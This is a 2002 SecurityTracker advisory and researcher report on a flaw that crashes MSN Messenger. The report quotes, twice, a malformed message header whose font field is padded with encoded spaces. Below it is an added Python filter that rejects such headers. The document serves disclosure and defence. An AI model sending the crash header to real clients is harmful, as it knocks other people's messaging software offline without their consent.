SecurityTracker.com
Category:   Application (Instant Messaging/IRC/Chat)  >   MSN Messenger
Vendors:   Microsoft
Microsoft MSN Messenger Instant Messaging Client Malformed Header Processing Flaw Lets Remote Users Crash the Client
SecurityTracker Alert ID:  1004226
SecurityTracker URL:  http://securitytracker.com/id/1004226
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 7 2002
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A denial of service vulnerability was reported in Microsoft's MSN Messenger instant messaging client software. A remote user can cause another user's client to crash.

It is reported that a remote user can send an instant message containing a malformed header to an MSN Messenger client to cause the client to crash.

A demonstration exploit header is provided:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0;
PF=22

hey friend, how are you?
<end>

The vendor has reportedly been notified.

Impact:   A remote user can cause another user's MSN Messenger client to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Exception handling error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  6 May 2002 15:04:13 -0000
Subject:  Misformated message header causes msn messenger to crash




Introduction to the flaw.
MSN Messenger is a popular Instant-Messaging client from 
Microsoft. After the previous flaws regarding the privacy 
of users, another flaw is discovered. This flaw makes the 
MSN Messenger client crash after receiving a misformatted 
font variable in the message header with instant messages. 

How does it work exactly?
The MSN Messenger client works by sending a header with 
every message. So every time a user wants to send a 
message, it generates a header, containing information 
about the font, the color of the message and some other 
information. 

The flaw
A normal header looks something like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

When we replace the font field with something very large, 
creating an overflow, the header will look like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

As a result the MSN Messenger client will crash.

This flaw only crashes the MSN Messenger from Microsoft. 
Trillian is not affected.

This flaw is a severe danger, as it's not so hard for 
hackers to use this flaw in their application. 
Microsoft has been informed of this issue. 
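
With no fix listed, a receiving client or filter has to treat the font field as untrusted input. The following is an added example, not part of the advisory or the original report: it parses the X-MMS-IM-Format header and rejects font names that are overlong or padded. The 31-character limit and all function names are assumptions, since the page gives no length threshold.

```python
from urllib.parse import unquote

# Assumed policy limit; the advisory gives no threshold for the crash.
MAX_FONT_NAME = 31


def split_message(payload):
    """Split a message payload into (lowercased header dict, body)."""
    head, _, body = payload.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.split("\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers, body


def parse_im_format(value):
    """Parse 'FN=...; EF=B; CO=ff' into a dict of still-encoded fields."""
    fields = {}
    for part in value.split(";"):
        key, sep, val = part.strip().partition("=")
        if sep:
            fields[key.upper()] = val
    return fields


def check_message(payload):
    """Return reasons to drop the message; an empty list means accept."""
    headers, _ = split_message(payload)
    fields = parse_im_format(headers.get("x-mms-im-format", ""))
    font = unquote(fields.get("FN", ""))  # decode %20 etc. before measuring
    problems = []
    if len(font) > MAX_FONT_NAME:
        problems.append(f"FN is {len(font)} chars, limit {MAX_FONT_NAME}")
    if font != " ".join(font.split()):
        problems.append("FN has leading, trailing or repeated whitespace")
    return problems

# Constructed samples shaped like the two headers quoted in the advisory.
HEAD = "MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n"
TAIL = "; EF=B; CO=ff; CS=0; PF=22\r\n\r\nhey friend, how are you?"
NORMAL = HEAD + "X-MMS-IM-Format: FN=MS%20Sans%20Serif" + TAIL
PADDED = (HEAD + "X-MMS-IM-Format: FN=Times" + "%20" * 35 + "New"
          + "%20" * 22 + "Roman" + "%20" * 11 + TAIL)

if __name__ == "__main__":
    for name, msg in (("normal", NORMAL), ("padded", PADDED)):
        print(name, check_message(msg) or "accept")
```

The length is measured after percent-decoding, so the check reflects the string a renderer would actually handle rather than its encoded size.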


 
 



Copyright 2013, SecurityGlobal.net LLC